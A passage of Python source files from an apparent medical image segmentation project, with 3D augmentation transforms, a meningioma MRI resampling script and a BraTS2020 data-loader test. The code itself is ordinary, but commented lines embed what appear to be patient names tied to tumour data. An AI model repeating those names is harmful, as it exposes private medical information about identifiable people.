roi_size: Union[Sequence[int], np.ndarray, None] = None, roi_start: Union[Sequence[int], np.ndarray, None] = None, roi_end: Union[Sequence[int], np.ndarray, None] = None, ) -> None: """ Args: roi_center: voxel coordinates for center of the crop ROI. roi_size: size of the crop ROI, if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. roi_start: voxel coordinates for start of the crop ROI. roi_end: voxel coordinates for end of the crop ROI, if a coordinate is out of image, use the end coordinate of image. roi_slices: list of slices for each of the spatial dimensions. 
""" if roi_center is not None and roi_size is not None: roi_center = np.asarray(roi_center, dtype=np.int16) roi_size = np.asarray(roi_size, dtype=np.int16) roi_start_np = np.maximum(roi_center - np.floor_divide(roi_size, 2), 0) roi_end_np = np.maximum(roi_start_np + roi_size, roi_start_np) else: if roi_start is None or roi_end is None: raise ValueError("Please specify either roi_center, roi_size or roi_start, roi_end.") roi_start_np = np.maximum(np.asarray(roi_start, dtype=np.int16), 0) roi_end_np = np.maximum(np.asarray(roi_end, dtype=np.int16), roi_start_np) # Allow for 1D by converting back to np.array (since np.maximum will convert to int) roi_start_np = roi_start_np if isinstance(roi_start_np, np.ndarray) else np.array([roi_start_np]) roi_end_np = roi_end_np if isinstance(roi_end_np, np.ndarray) else np.array([roi_end_np]) # convert to slices self.slices = [slice(s, e) for s, e in zip(roi_start_np, roi_end_np)] def __call__(self, img: Union[np.ndarray, torch.Tensor]): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't apply to the channel dim. """ sd = min(len(self.slices), len(img.shape[1:])) # spatial dims slices = [slice(None)] + self.slices[:sd] return img[tuple(slices)] class CenterSpatialCrop: """ Crop at the center of image with specified ROI size. If a dimension of the expected ROI size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than the expected ROI, and the cropped results of several images may not have exactly the same shape. Args: roi_size: the spatial size of the crop region e.g. [224,224,128] if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. If its components have non-positive values, the corresponding size of input image will be used. for example: if the spatial size of input data is [40, 40, 40] and `roi_size=[32, 64, -1]`, the spatial size of output data will be [32, 40, 40]. """ def __init__(self, roi_size: Union[Sequence[int], int]) -> None: self.roi_size = roi_size def __call__(self, img: np.ndarray): """ Apply the transform to `img`, assuming `img` is channel-first and slicing doesn't apply to the channel dim. """ assert img.ndim == 4, "img ndim 必须为4, (channel, W, H, D)" center = [i // 2 for i in img.shape[1:]] cropper = SpatialCrop(roi_center=center, roi_size=self.roi_size) return cropper(img) def map_binary_to_indices( label: np.ndarray, image: Optional[np.ndarray] = None, image_threshold: float = 0.0, ) -> Tuple[np.ndarray, np.ndarray]: """ Compute the foreground and background of input label data, return the indices after fattening. For example: ``label = np.array([[[0, 1, 1], [1, 0, 1], [1, 1, 0]]])`` ``foreground indices = np.array([1, 2, 3, 5, 6, 7])`` and ``background indices = np.array([0, 4, 8])`` Args: label: use the label data to get the foreground/background information. image: if image is not None, use ``label = 0 & image > image_threshold`` to define background. so the output items will not map to all the voxels in the label. image_threshold: if enabled `image`, use ``image > image_threshold`` to determine the valid image content area and select background only in this area. 
""" # Prepare fg/bg indices if label.shape[0] > 1: label = label[1:] # for One-Hot format data, remove the background channel label_flat = np.any(label, axis=0).ravel() # in case label has multiple dimensions fg_indices = np.nonzero(label_flat)[0] if image is not None: img_flat = np.any(image > image_threshold, axis=0).ravel() bg_indices = np.nonzero(np.logical_and(img_flat, ~label_flat))[0] else: bg_indices = np.nonzero(~label_flat)[0] return fg_indices, bg_indices class RandCropByPosNegLabel: """ Crop random fixed sized regions with the center being a foreground or background voxel based on the Pos Neg Ratio. And will return a list of arrays for all the cropped images. For example, crop two (3 x 3) arrays from (5 x 5) array with pos/neg=1:: [[[0, 0, 0, 0, 0], [0, 1, 2, 1, 0], [[0, 1, 2], [[2, 1, 0], [0, 1, 3, 0, 0], --> [0, 1, 3], [3, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0]] [0, 0, 0]] [0, 0, 0, 0, 0]]] If a dimension of the expected spatial size is bigger than the input image size, will not crop that dimension. So the cropped result may be smaller than expected size, and the cropped results of several images may not have exactly same shape. Args: spatial_size: the spatial size of the crop region e.g. [224, 224, 128]. if a dimension of ROI size is bigger than image size, will not crop that dimension of the image. if its components have non-positive values, the corresponding size of `label` will be used. for example: if the spatial size of input data is [40, 40, 40] and `spatial_size=[32, 64, -1]`, the spatial size of output data will be [32, 40, 40]. label: the label image that is used for finding foreground/background, if None, must set at `self.__call__`. Non-zero indicates foreground, zero indicates background. pos: used with `neg` together to calculate the ratio ``pos / (pos + neg)`` for the probability to pick a foreground voxel as a center rather than a background voxel. neg: used with `pos` together to calculate the ratio ``pos / (pos + neg)`` for the probability to pick a foreground voxel as a center rather than a background voxel. num_samples: number of samples (crop regions) to take in each list. image: optional image data to help select valid area, can be same as `img` or another image array. if not None, use ``label == 0 & image > image_threshold`` to select the negative sample (background) center. So the crop center will only come from the valid image areas. image_threshold: if enabled `image`, use ``image > image_threshold`` to determine the valid image content areas. fg_indices: if provided pre-computed foreground indices of `label`, will ignore above `image` and `image_threshold`, and randomly select crop centers based on them, need to provide `fg_indices` and `bg_indices` together, expect to be 1 dim array of spatial indices after flattening. a typical usage is to call `FgBgToIndices` transform first and cache the results. bg_indices: if provided pre-computed background indices of `label`, will ignore above `image` and `image_threshold`, and randomly select crop centers based on them, need to provide `fg_indices` and `bg_indices` together, expect to be 1 dim array of spatial indices after flattening. a typical usage is to call `FgBgToIndices` transform first and cache the results. Raises: ValueError: When ``pos`` or ``neg`` are negative. ValueError: When ``pos=0`` and ``neg=0``. Incompatible values. 
""" def __init__( self, spatial_size: Union[Sequence[int], int], label: Optional[np.ndarray] = None, pos: float = 1.0, neg: float = 1.0, num_samples: int = 1, image: Optional[np.ndarray] = None, image_threshold: float = 0.0, random_state: np.random.RandomState = None, ) -> None: self.spatial_size = spatial_size self.label = label if pos < 0 or neg < 0: raise ValueError(f"pos and neg must be nonnegative, got pos={pos} neg={neg}.") if pos + neg == 0: raise ValueError("Incompatible values: pos=0 and neg=0.") self.pos_ratio = pos / (pos + neg) self.num_samples = num_samples self.image = image self.image_threshold = image_threshold self.centers: Optional[List[List[np.ndarray]]] = None self.random_state = random_state def randomize( self, label: np.ndarray, image: Optional[np.ndarray] = None, ) -> None: self.spatial_size = self.spatial_size fg_indices_, bg_indices_ = map_binary_to_indices(label, image, self.image_threshold) self.centers = generate_pos_neg_label_crop_centers( self.spatial_size, self.num_samples, self.pos_ratio, label.shape[1:], fg_indices_, bg_indices_, rand_state=self.random_state ) def __call__( self, img: np.ndarray, label: Optional[np.ndarray] = None, image: Optional[np.ndarray] = None, is_label = False, ) -> List[np.ndarray]: """ Args: img: input data to crop samples from based on the pos/neg ratio of `label` and `image`. Assumes `img` is a channel-first array. label: the label image that is used for finding foreground/background, if None, use `self.label`. image: optional image data to help select valid area, can be same as `img` or another image array. use ``label == 0 & image > image_threshold`` to select the negative sample(background) center. so the crop center will only exist on valid image area. if None, use `self.image`. fg_indices: foreground indices to randomly select crop centers, need to provide `fg_indices` and `bg_indices` together. bg_indices: background indices to randomly select crop centers, need to provide `fg_indices` and `bg_indices` together. """ if label is None: label = self.label if label is None: raise ValueError("label should be provided.") if len(label.shape) == 3: label = np.expand_dims(label, axis=0) if image is None: image = self.image if not is_label: self.randomize(label, image) else : if len(img.shape) == 3: img = np.expand_dims(img, axis=0) results: List[np.ndarray] = [] if self.centers is not None: for center in self.centers: cropper = SpatialCrop(roi_center=tuple(center), roi_size=self.spatial_size) # type: ignore r = cropper(img) if is_label: if len(r.shape) == 4: r = np.squeeze(r, axis=0) results.append(r) return results class Normalize: """ Apply simple min-max scaling to a given input tensor, i.e. shrinks the range of the data in a fixed range of [-1, 1]. 
""" def __init__(self, min_value, max_value): assert max_value > min_value self.min_value = min_value self.value_range = max_value - min_value def __call__(self, m): norm_0_1 = (m - self.min_value) / self.value_range return np.clip(2 * norm_0_1 - 1, -1, 1) class GammaTransformer: def __init__(self, random_state, gamma_range=(0.5, 2), epsilon=1e-7, per_channel=False, retain_stats: Union[bool, Callable[[], bool]] = False, execution_probability=0.2) -> None: self.gamma_range = gamma_range self.epsilon = epsilon self.per_channel = per_channel self.retain_stats = retain_stats self.execution_probability = execution_probability self.random_state = random_state def __call__(self, m): if self.random_state.uniform() < self.execution_probability: m = augment_gamma(m, gamma_range=self.gamma_range, epsilon=self.epsilon, per_channel=self.per_channel, retain_stats=self.retain_stats) return m class MirrorTransform: """ Randomly mirrors data along specified axes. Mirroring is evenly distributed. Probability of mirroring along each axis is 0.5 Args: axes (tuple of int): axes along which to mirror """ def __init__(self, random_state, axes=(0, 1, 2), execution_probability=0.2): self.execution_probability = execution_probability self.random_state = random_state self.axes = axes if max(axes) > 2: raise ValueError("MirrorTransform now takes the axes as the spatial dimensions. What previously was " "axes=(2, 3, 4) to mirror along all spatial dimensions of a 5d tensor (b, c, x, y, z) " "is now axes=(0, 1, 2). Please adapt your scripts accordingly.") def __call__(self, data, seg=None): if self.random_state.uniform() < self.execution_probability: ret_val = augment_mirroring(data, self.random_state, sample_seg=seg, axes=self.axes) data = ret_val[0] if seg is not None: seg = ret_val[1] return data, seg # if __name__ == "__main__": # print("数据增强函数测试") # r = Random(seed=8) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # print(r.do_transform(0.5)) # f = RandomFlip(r.R) # image = h5py.File("./BAI_YUE_BIN_data.h5", "r") # single_model_image = image["image"][:1] # label = image["label"][0] # print(f"label shape is {label.shape}") # print(single_model_image.shape) # sd = Standardize(a_min=single_model_image.min(), a_max=single_model_image.max()) # single_model_image = sd(single_model_image) # print("归一化变换") # plot_3d(single_model_image) # plot_3d_label(label) # # print("随机翻转变换") # # single_model_image, label = f(single_model_image, label) # # plot_3d(single_model_image) # # plot_3d_label(label) # # print("随机旋转变换") # # ro = RandomRotate(random_state=r.R) # # single_model_image, label = ro(single_model_image, label) # # print(single_model_image.shape) # # plot_3d(single_model_image) # # plot_3d_label(label) # # print("添加高斯噪声") # # gn = AdditiveGaussianNoise(r.R) # # single_model_image = gn(single_model_image) # # plot_3d(single_model_image) # print("添加柏松噪声") # pn = AdditivePoissonNoise(r.R) # single_model_image = pn(single_model_image) # plot_3d(single_model_image) ``` #### File: MedicalSeg/test/spacing_resize_h5.py ```python import SimpleITK as sitk import os import h5py import numpy as np import matplotlib.pyplot as plt from PIL import Image from scipy import ndimage import zipfile img_size = (288, 288) t1_d = {} t2f_d = {} t1_mask = {} t2f_mask = {} image_shapes = [] def padding_image_array_size(image_array, out_size): img_z, img_x, img_y = image_array.shape[0], image_array.shape[1], image_array.shape[2] out_z, out_x, out_y = out_size[0], out_size[1], out_size[2] if out_z > img_z: 
        z_up = int((out_z - img_z) / 2)
        z_down = out_z - img_z - z_up
        if out_x >= img_x and out_y >= img_y:
            # pad all three axes
            x_up = int((out_x - img_x) / 2)
            x_down = out_x - img_x - x_up
            y_up = int((out_y - img_y) / 2)
            y_down = out_y - img_y - y_up
            new_volume = np.pad(image_array, ((z_up, z_down), (x_up, x_down), (y_up, y_down)), mode='constant')
        else:
            new_volume = np.pad(image_array, (z_up, z_down), mode='constant')
            new_volume = img_center_crop(new_volume, (24, 256, 256))
    else:
        # center-crop the z axis down to out_size[0]
        z_start = (img_z - out_z) // 2
        image_array = image_array[z_start: z_start + out_size[0], :, :]
        if out_x >= img_x and out_y >= img_y:
            # pad the two in-plane axes
            x_up = int((out_x - img_x) / 2)
            x_down = out_x - img_x - x_up
            y_up = int((out_y - img_y) / 2)
            y_down = out_y - img_y - y_up
            new_volume = np.pad(image_array, ((0, 0), (x_up, x_down), (y_up, y_down)), mode='constant')
        else:
            new_volume = img_center_crop(image_array, (24, 256, 256))
    return new_volume


def resample_image(itk_image, out_spacing=(1.0, 1.0, 1.0), is_label=False):
    original_spacing = itk_image.GetSpacing()
    original_size = itk_image.GetSize()
    out_size = [int(np.round(original_size[0] * (original_spacing[0] / out_spacing[0]))),
                int(np.round(original_size[1] * (original_spacing[1] / out_spacing[1]))),
                int(np.round(original_size[2] * (original_spacing[2] / out_spacing[2])))]

    resample = sitk.ResampleImageFilter()
    resample.SetOutputSpacing(out_spacing)
    resample.SetSize(out_size)
    resample.SetOutputDirection(itk_image.GetDirection())
    resample.SetOutputOrigin(itk_image.GetOrigin())
    resample.SetTransform(sitk.Transform())
    resample.SetDefaultPixelValue(itk_image.GetPixelIDValue())
    if is_label:
        resample.SetInterpolator(sitk.sitkNearestNeighbor)
    else:
        resample.SetInterpolator(sitk.sitkBSpline)
    return resample.Execute(itk_image)


def _get_affine(img):
    """
    Get or construct the affine matrix of the image; it can be used to correct
    spacing and orientation or to execute spatial transforms.
    The affine matrix is built from the direction, spacing and origin information.
    Refer to: https://github.com/RSIP-Vision/medio

    Args:
        img: an ITK image object loaded from an image file.
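
    Example (hypothetical values): an identity direction, spacing ``(1, 1, 2)``
    and origin ``(0, 0, -10)`` yield::

        [[ 1,  0,  0,   0],
         [ 0,  1,  0,   0],
         [ 0,  0,  2, -10],
         [ 0,  0,  0,   1]]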
""" # print(img.GetDirection()) direction = img.GetDirection() spacing = np.asarray(img.GetSpacing()) origin = np.asarray(img.GetOrigin()) direction = np.asarray(direction) affine = np.eye(direction.shape[0] + 1) affine[(slice(-1), slice(-1))] = direction @ np.diag(spacing) affine[(slice(-1), -1)] = origin return affine def img_center_crop(image, crop_size): assert len(image.shape) == 3, 'invalid image size in sliding window' cropping = [] z_start, x_start, y_start = 0, 0, 0 img_z, img_x, img_y = image.shape[0], image.shape[1], image.shape[2] crop_z, crop_x, crop_y = crop_size[0], crop_size[1], crop_size[2] # x or y 一个比crop大 或者两个都大 if img_x > crop_x and img_y > crop_y: starting = [int((crop_z - img_z) / 2), int((img_x - crop_x) / 2), int((img_y - crop_y) / 2)] z_start, x_start, y_start = starting[0], starting[1], starting[2] elif img_x > crop_x and img_y <= crop_y: starting = [int((crop_z - img_z) / 2), int((img_x - crop_x) / 2), int((crop_y - img_y) / 2)] z_start, x_start, y_start = starting[0], starting[1], 0 y_up = int((crop_y - img_y) / 2) y_down = crop_y - img_y - y_up image = np.pad(image, ((0, 0), (0, 0), (y_up, y_down)), mode='constant') elif img_x <= crop_x and img_y > crop_y: starting = [int((crop_z - img_z) / 2), int((crop_x - img_x) / 2), int((img_y - crop_y) / 2)] z_start, x_start, y_start = starting[0], 0, starting[2] x_up = int((crop_x - img_x) / 2) x_down = crop_x - img_x - x_up image = np.pad(image, ((0, 0), (x_up, x_down), (0, 0)), mode='constant') img_crop = image[z_start: z_start + crop_size[0], x_start:x_start + crop_size[1], y_start: y_start + crop_size[2]] return img_crop def resample_image_array_size(image_array, out_size, order=3): #Bilinear interpolation would be order=1, # nearest is order=0, # and cubic is the default (order=3). 
    real_resize = np.array(out_size) / image_array.shape
    new_volume = ndimage.zoom(image_array, zoom=real_resize, order=order)
    return new_volume


def read_data(dir):
    if dir[-1] != "/":
        dir += "/"
    for each_patient_dir in os.listdir(dir):
        if each_patient_dir[0] == ".":
            continue
        patient_path = dir + each_patient_dir
        if not os.path.isdir(patient_path):
            continue
        reader = sitk.ImageSeriesReader()
        series_ids = reader.GetGDCMSeriesIDs(patient_path)
        # print(series_ids)
        # with the series ids in hand, look for the annotated T1 and FLAIR series
        if patient_path[-1] != "/":
            patient_path += "/"
        t1_series = ""
        fl_series = ""
        nrrd_t1_data = None
        nrrd_fl_data = None
        for each_path in os.listdir(patient_path):
            # print(each_path)
            if os.path.isdir(patient_path + each_path) and each_path[0] != ".":
                # found the annotation folder
                dir1 = patient_path + each_path + "/"
                print(dir1)
                for series_id_dir in os.listdir(dir1):
                    if os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd.zip") and not os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd"):
                        # unzip first
                        zFile = zipfile.ZipFile(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd.zip", "r")
                        for fileM in zFile.namelist():
                            zFile.extract(fileM, dir1 + series_id_dir + "/")
                        zFile.close()
                        # found the T1 series
                        t1_series = series_id_dir
                        nrrd_t1_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd")
                        print("found T1 label, shape " + str(sitk.GetArrayFromImage(nrrd_t1_data).shape))
                        # nrrd_t1_data, nrrd_options = nrrd.read(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd")
                    elif os.path.exists(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd"):
                        # found the T1 series
                        t1_series = series_id_dir
                        nrrd_t1_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "T1WI-CE_t_1.nrrd")
                        print("found T1 label, shape " + str(sitk.GetArrayFromImage(nrrd_t1_data).shape))
                    elif os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd.zip") and not os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd"):
                        # unzip first
                        zFile = zipfile.ZipFile(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd.zip", "r")
                        for fileM in zFile.namelist():
                            zFile.extract(fileM, dir1 + series_id_dir + "/")
                        zFile.close()
                        # found the FLAIR series
                        fl_series = series_id_dir
                        nrrd_fl_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd")
                        print("found FLAIR label, shape " + str(sitk.GetArrayFromImage(nrrd_fl_data).shape))
                    elif os.path.exists(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd"):
                        # found the FLAIR series
                        fl_series = series_id_dir
                        nrrd_fl_data = sitk.ReadImage(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd")
                        print("found FLAIR label, shape " + str(sitk.GetArrayFromImage(nrrd_fl_data).shape))
                        # nrrd_fl_data, nrrd_options = nrrd.read(dir1 + series_id_dir + "/" + "FL-CE_e_1.nrrd")
                        # print(nrrd_options)
        # Each patient has five DICOM series in total, but only the T1 and FLAIR
        # series found above are used.
        dicom_series_t1 = reader.GetGDCMSeriesFileNames(patient_path, t1_series)
        # file = sitk.ReadImage(patient_path)
        reader.SetFileNames(dicom_series_t1)
        img_t1 = reader.Execute()
        img_array_t1 = sitk.GetArrayFromImage(img_t1)
        # print("t1 series: " + str(img_array_t1.shape))
        # print("t1 label is {}".format(nrrd_t1_data.shape))
        dicom_series_fl = reader.GetGDCMSeriesFileNames(patient_path, fl_series)
        reader.SetFileNames(dicom_series_fl)
        img_fl = reader.Execute()
        img_array_fl = sitk.GetArrayFromImage(img_fl)
        if nrrd_t1_data is None:
            print("no T1 series for this patient, skipping")
            continue
        # print(nrrd_t1_data.shape)
        # num = len(img_array_t1)
        # num_fl = len(img_array_fl)
        # num = min(num, num_fl)
        # if "CHEN_SHA_LIN" in dir1:
        #     img_array_t1 = resample_image_array_size(img_array_t1, out_size=(32, 256, 256), order=3)
        #     img_array_fl = resample_image_array_size(img_array_fl, out_size=(32, 256, 256), order=3)
        #     nrrd_t1_data = resample_image_array_size(nrrd_t1_data, out_size=(32, 256, 256), order=1)
        #     nrrd_fl_data = resample_image_array_size(nrrd_fl_data, out_size=(32, 256, 256), order=1)
        #     print(np.unique(nrrd_t1_data))
        #     for k in range(2, 30):
        #         plt.subplot(2, 2, 1)
        #         plt.imshow(img_array_t1[k], cmap="gray")
        #         plt.subplot(2, 2, 2)
        #         plt.imshow(nrrd_t1_data[k], cmap="gray")
        #         plt.subplot(2, 2, 3)
        #         plt.imshow(img_array_fl[k], cmap="gray")
        #         plt.subplot(2, 2, 4)
        #         plt.imshow(nrrd_fl_data[k], cmap="gray")
        #         plt.show()
        # print("t2_flare series: " + str(img_array_fl.shape))
        # print("fl label is {}".format(nrrd_fl_data.shape))
        # os._exit(0)
        resampled_image = resample_image(img_t1, (1., 1., 6.5))  # itk_image.GetSize() is (x, y, z)
        resampled_image = sitk.GetArrayFromImage(resampled_image)  # GetArrayFromImage() is (z, x, y)
        image_resample_t1 = padding_image_array_size(resampled_image, out_size=(24, 256, 256))
        # print(each_patient_dir)
        # print(image_resample_t1.shape)
        resampled_image = resample_image(img_fl, (1., 1., 6.5))  # itk_image.GetSize() is (x, y, z)
        resampled_image = sitk.GetArrayFromImage(resampled_image)  # GetArrayFromImage() is (z, x, y)
        image_resample_t2 = padding_image_array_size(resampled_image, out_size=(24, 256, 256))
        # print(image_resample_t2.shape)
        resampled_image = resample_image(nrrd_t1_data, (1., 1., 6.5), is_label=True)  # itk_image.GetSize() is (x, y, z)
        resampled_image = sitk.GetArrayFromImage(resampled_image)  # GetArrayFromImage() is (z, x, y)
        image_resample_t1_label = padding_image_array_size(resampled_image, out_size=(24, 256, 256))
        if nrrd_fl_data is None:
            # no edema (FLAIR) annotation: fall back to an all-zero label
            image_resample_t2_label = np.zeros_like(image_resample_t2)
            # itk_image_resample = sitk.GetImageFromArray(nrrd_fl_data)
            # sitk.WriteImage(itk_image_resample, "./data/label_data/mask/" + each_patient_dir + '_t2_mask.nii.gz')
        else:
            resampled_image = resample_image(nrrd_fl_data, (1., 1., 6.5), is_label=True)  # itk_image.GetSize() is (x, y, z)
            resampled_image = sitk.GetArrayFromImage(resampled_image)  # GetArrayFromImage() is (z, x, y)
            image_resample_t2_label = padding_image_array_size(resampled_image, out_size=(24, 256, 256))
        image_resample_t1 = resample_image_array_size(image_resample_t1, out_size=(32, 256, 256), order=3)
        image_resample_t2 = resample_image_array_size(image_resample_t2, out_size=(32, 256, 256), order=3)
        image_resample_t1_label = resample_image_array_size(image_resample_t1_label, out_size=(32, 256, 256), order=1)
        image_resample_t2_label = resample_image_array_size(image_resample_t2_label, out_size=(32, 256, 256), order=1)
        image_resample = np.stack([image_resample_t1, image_resample_t2])
        image_resample_label = np.stack([image_resample_t1_label, image_resample_t2_label])
        # for k in range(5, 28):
        #     plt.subplot(2, 2, 1)
        #     plt.imshow(image_resample_t1[k], cmap="gray")
        #     plt.subplot(2, 2, 2)
        #     plt.imshow(image_resample_t1_label[k], cmap="gray")
        #     plt.subplot(2, 2, 3)
        #     plt.imshow(image_resample_t2[k], cmap="gray")
        #     plt.subplot(2, 2, 4)
        #     plt.imshow(image_resample_t2_label[k], cmap="gray")
        #     plt.show()
        #     break
        h5_file_img = h5py.File("./data/Meningiomas/" + each_patient_dir + "_data.h5", "w")
        h5_file_img.create_dataset("image", data=image_resample, compression="gzip")
        h5_file_img.create_dataset("label", data=image_resample_label, compression="gzip")
        h5_file_img.close()


if __name__ == "__main__":
    ## process the raw data
    # read_data("./Grade I(所有病人数据)/")
    # read_data("./data/label/Grade_1")
    # read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_1/")
read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_2_invasion/") read_data("/home/datasets/Meningiomas/Data_Processing/label/Grade_2_noninvasion/") ``` #### File: MedicalSeg/test/test_brats2020_data.py ```python from functools import total_ordering import matplotlib.pyplot as plt import glob from tqdm import tqdm import numpy as np import torch import SimpleITK as sitk from medical_seg.transformer import RandomRotate, RandCropByPosNegLabel, RandomFlip, \ AdditiveGaussianNoise, AdditivePoissonNoise, Standardize, \ CenterSpatialCrop, Elatic, MirrorTransform, GammaTransformer from torch.utils.data import DataLoader, Dataset import time seed = 3213214325 sample_size = 2 random_state = np.random.RandomState(seed) spatial_size = (128, 128, 128) class Transform: def __init__(self, random_state) -> None: self.random_state = random_state self.rf = RandomFlip(self.random_state, execution_probability=1) self.rr = RandomRotate(self.random_state, angle_spectrum=30, execution_probability=1) self.elastic = Elatic(self.random_state, alpha=(0, 900), sigma=(9, 13), scale=(0.85, 1.25), order_seg=0, order_data=3, execution_probability=1) self.gamma = GammaTransformer(self.random_state, gamma_range=(0.5, 2), execution_probability=1) self.mirror = MirrorTransform(self.random_state, axes=(0, 1, 2), execution_probability=1) def __call__(self, image, label): start = time.time() image, label = self.rf(image, label) end = time.time() print(f"rf spend {end - start}") start = time.time() image, label = self.rr(image, label) end = time.time() print(f"rr spend {end - start}") # start = time.time() # image, label = self.elastic(m=image, seg=label) # end = time.time() # print(f"elastic spend {end - start}") start = time.time() # image, label = self.elastic(m=image, seg=label) image = self.gamma(image) end = time.time() print(f"gamma spend {end - start}") start = time.time() image, label = self.mirror(image, seg=label) end = time.time() print(f"mirror spend {end - start}") return image, label class BraTSDataset(Dataset): def __init__(self, paths, train=True) -> None: super().__init__() self.paths = paths[:4] self.train = train if train: self.transform = Transform(random_state=random_state) self.random_crop = RandCropByPosNegLabel(spatial_size=spatial_size, pos=1, neg=1, num_samples=sample_size, image=None, image_threshold=0, random_state=random_state) else : self.transform = None self.random_crop = None self.cached_image = [] self.cached_label = [] for p in tqdm(self.paths, total=len(self.paths), desc="loading training data........"): image, label = self._read_image(p) sd = Standardize(a_min=image.min(), a_max=image.max(), b_min=0, b_max=1, clip=True) image = sd(image) self.cached_image.append(image) self.cached_label.append(label) def __getitem__(self, i): image, label = self.cached_image[i], self.cached_label[i] if self.train: image, label = self.transform(image, label) image_patchs = self.random_crop(image, label=label) label_patchs = self.random_crop(label, label=label, is_label=True) # for i, imla in enumerate(zip(image_patchs, label_patchs)): # image_patchs[i], label_patchs[i] = self.transform(imla[0], imla[1]) else : assert len(image.shape) == 4, "image shape is must be 4." assert len(label.shape) == 3, "label shape is must be 3." 
            image = [image]
            label = [label]
        if self.train:
            return {
                "image": image_patchs,
                "label": label_patchs
            }
        return {
            "image": image,
            "label": label,
        }

    def __len__(self):
        return len(self.paths)

    def _read_image(self, image_path):
        images = []
        label = None
        paths = sorted(glob.glob(image_path + "/*.nii"))
        for p in paths:
            if "_seg.nii" in p:
                # found the segmentation file
                label = sitk.ReadImage(p)
                label = sitk.GetArrayFromImage(label)
            else:
                image = sitk.ReadImage(p)
                image = sitk.GetArrayFromImage(image)
                images.append(image)
        images = np.array(images)
        return images, label


def collate_fn(batch):
    assert len(batch) == 1, "with random cropping, control the patch count via sample_size; batch_size must be 1"
    batch = batch[0]
    image = batch["image"]
    label = batch["label"]
    image = np.array(image, dtype=np.float32)
    label = np.array(label, dtype=np.int16)
    return torch.from_numpy(image), torch.from_numpy(label)


if __name__ == "__main__":
    data_paths = sorted(glob.glob("./data/MICCAI_BraTS2020_TrainingData/*"))[:-2]
    print(data_paths)
    train_paths = data_paths[:315]
    val_paths = data_paths[315:]
    ## test the dataloader
    ds = BraTSDataset(paths=data_paths, train=True)
    dl = DataLoader(ds, batch_size=1, shuffle=False, collate_fn=collate_fn)
    for image, label in dl:
        print(image.shape)
        print(label.shape)
        plt.subplot(1, 5, 1)
        plt.imshow(image[0, 0, 60], cmap="gray")
        plt.subplot(1, 5, 2)
        plt.imshow(image[0, 1, 60], cmap="gray")
        plt.subplot(1, 5, 3)
        plt.imshow(image[0, 2, 60], cmap="gray")
        plt.subplot(1, 5, 4)
        plt.imshow(image[0, 3, 60], cmap="gray")
        plt.subplot(1, 5, 5)
        plt.imshow(label[0, 60], cmap="gray")
        plt.show()
```